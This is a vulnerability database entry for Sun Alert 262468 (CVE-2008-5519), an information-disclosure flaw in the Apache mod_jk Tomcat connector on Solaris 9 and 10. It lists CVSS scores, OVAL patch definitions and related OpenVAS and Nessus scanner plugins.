Executive Summary

Summary
Title Sun Alert 262468 Security Vulnerability in the Apache 1.3 "mod_jk" Module may Lead to Unauthorized Access to Data
Informations
Name SUN-262468 First vendor Publication 2009-06-25
Vendor Sun Last vendor Modification 2009-06-25
Severity (Vendor) N/A Revision N/A

Security-Database Scoring CVSS v3

Cvss vector : N/A
Overall CVSS Score NA
Base Score NA Environmental Score NA
impact SubScore NA Temporal Score NA
Exploitabality Sub Score NA
 
Calculate full CVSS 3.0 Vectors scores

Security-Database Scoring CVSS v2

Cvss vector : (AV:N/AC:H/Au:N/C:P/I:N/A:N)
Cvss Base Score 2.6 Attack Range Network
Cvss Impact Score 2.9 Attack Complexity High
Cvss Expoit Score 4.9 Authentication None Required
Calculate full CVSS 2.0 Vectors scores

Detail

Product: Solaris 9 Operating System Solaris 10 Operating System

Security vulnerability has been found in the Tomcat Connector (mod_jk)
module for Apache HTTP server which affects the Apache 1.3 web server
bundled with Solaris 10 and Solaris 9.

This issue may allow a remote unprivileged user who provides a specially crafted
HTTP requests to bypass access control and gain access to unauthorized data.

Additional information regarding this issue is available at:

CVE-2008-5519 at: http://www.security-database.com/detail.php?cve=CVE-2008-5519


State: Resolved
First released: 25-Jun-2009

Original Source

Url : http://blogs.sun.com/security/entry/sun_alert_262468_security_vulnerability

CWE : Common Weakness Enumeration

% Id Name
100 % CWE-200 Information Exposure

OVAL Definitions

Definition Id: oval:org.mitre.oval:def:13218
 
Oval ID: oval:org.mitre.oval:def:13218
Title: DSA-1810-1 libapache-mod-jk -- information disclosure
Description: An information disclosure flaw was found in mod_jk, the Tomcat Connector module for Apache. If a buggy client included the "Content-Length" header without providing request body data, or if a client sent repeated equests very quickly, one client could obtain a response intended for another client. For the stable distribution, this problem has been fixed in version 1:1.2.26-2+lenny1. The oldstable distribution, this problem has been fixed in version 1:1.2.18-3etch2. For the testing distribution and the unstable distribution, this problem has been fixed in version 1:1.2.26-2.1. We recommend that you upgrade your libapache-mod-jk packages.
Family: unix Class: patch
Reference(s): DSA-1810-1
CVE-2008-5519
Version: 5
Platform(s): Debian GNU/Linux 5.0
Debian GNU/Linux 4.0
Product(s): libapache-mod-jk
Definition Synopsis:
Definition Id: oval:org.mitre.oval:def:7824
 
Oval ID: oval:org.mitre.oval:def:7824
Title: DSA-1810 libapache-mod-jk -- information disclosure
Description: An information disclosure flaw was found in mod_jk, the Tomcat Connector module for Apache. If a buggy client included the "Content-Length" header without providing request body data, or if a client sent repeated requests very quickly, one client could obtain a response intended for another client. The oldstable distribution (etch), this problem has been fixed in version 1:1.2.18-3etch2.
Family: unix Class: patch
Reference(s): DSA-1810
CVE-2008-5519
Version: 5
Platform(s): Debian GNU/Linux 5.0
Debian GNU/Linux 4.0
Product(s): libapache-mod-jk
Definition Synopsis:

CPE : Common Platform Enumeration

TypeDescriptionCount
Application 24
Application 104

OpenVAS Exploits

Date Description
2010-02-03 Name : Solaris Update for Apache 1.3 122911-19
File : nvt/gb_solaris_122911_19.nasl
2010-02-03 Name : Solaris Update for Apache 1.3 122912-19
File : nvt/gb_solaris_122912_19.nasl
2009-11-11 Name : SuSE Security Summary SUSE-SR:2009:018
File : nvt/suse_sr_2009_018.nasl
2009-10-13 Name : Solaris Update for tomcat security 114016-04
File : nvt/gb_solaris_114016_04.nasl
2009-10-13 Name : Solaris Update for tomcat security 114017-05
File : nvt/gb_solaris_114017_05.nasl
2009-10-13 Name : Solaris Update for Apache 1.3 122911-17
File : nvt/gb_solaris_122911_17.nasl
2009-10-13 Name : Solaris Update for Apache 1.3 122912-17
File : nvt/gb_solaris_122912_17.nasl
2009-09-23 Name : Solaris Update for tomcat security 114017-04
File : nvt/gb_solaris_114017_04.nasl
2009-09-23 Name : Solaris Update for Apache 1.3 122911-16
File : nvt/gb_solaris_122911_16.nasl
2009-09-23 Name : Solaris Update for Apache 1.3 122912-16
File : nvt/gb_solaris_122912_16.nasl
2009-07-06 Name : Gentoo Security Advisory GLSA 200906-04 (mod_jk)
File : nvt/glsa_200906_04.nasl
2009-06-15 Name : RedHat Security Advisory RHSA-2009:1087
File : nvt/RHSA_2009_1087.nasl
2009-04-28 Name : RedHat Security Advisory RHSA-2009:0446
File : nvt/RHSA_2009_0446.nasl
2009-04-17 Name : Apache Tomcat mod_jk Information Disclosure Vulnerability
File : nvt/gb_apache_tomcat_mod_jk_info_disc_vuln.nasl

Open Source Vulnerability Database (OSVDB)

Id Description
53381 Apache Tomcat JK Connector Content-Length Header Cross-user Information Discl...

Nessus® Vulnerability Scanner

Date Description
2010-06-14 Name : The remote web server is prone to an information disclosure attack.
File : mod_jk_1_2_27.nasl - Type : ACT_GATHER_INFO
2010-01-10 Name : The remote Red Hat host is missing a security update.
File : redhat-RHSA-2009-1618.nasl - Type : ACT_GATHER_INFO
2009-11-05 Name : The remote openSUSE host is missing a security update.
File : suse_11_0_apache2-mod_jk-091028.nasl - Type : ACT_GATHER_INFO
2009-11-05 Name : The remote openSUSE host is missing a security update.
File : suse_11_1_apache2-mod_jk-091028.nasl - Type : ACT_GATHER_INFO
2009-11-05 Name : The remote openSUSE host is missing a security update.
File : suse_apache2-mod_jk-6599.nasl - Type : ACT_GATHER_INFO
2009-06-30 Name : The remote Gentoo host is missing one or more security-related patches.
File : gentoo_GLSA-200906-04.nasl - Type : ACT_GATHER_INFO
2009-06-03 Name : The remote Debian host is missing a security-related update.
File : debian_DSA-1810.nasl - Type : ACT_GATHER_INFO
2006-07-18 Name : The remote host is missing Sun Security Patch number 122911-37
File : solaris10_122911.nasl - Type : ACT_GATHER_INFO
2006-07-18 Name : The remote host is missing Sun Security Patch number 122912-37
File : solaris10_x86_122912.nasl - Type : ACT_GATHER_INFO
2004-07-12 Name : The remote host is missing Sun Security Patch number 114016-08
File : solaris9_114016.nasl - Type : ACT_GATHER_INFO
2004-07-12 Name : The remote host is missing Sun Security Patch number 114017-07
File : solaris9_x86_114017.nasl - Type : ACT_GATHER_INFO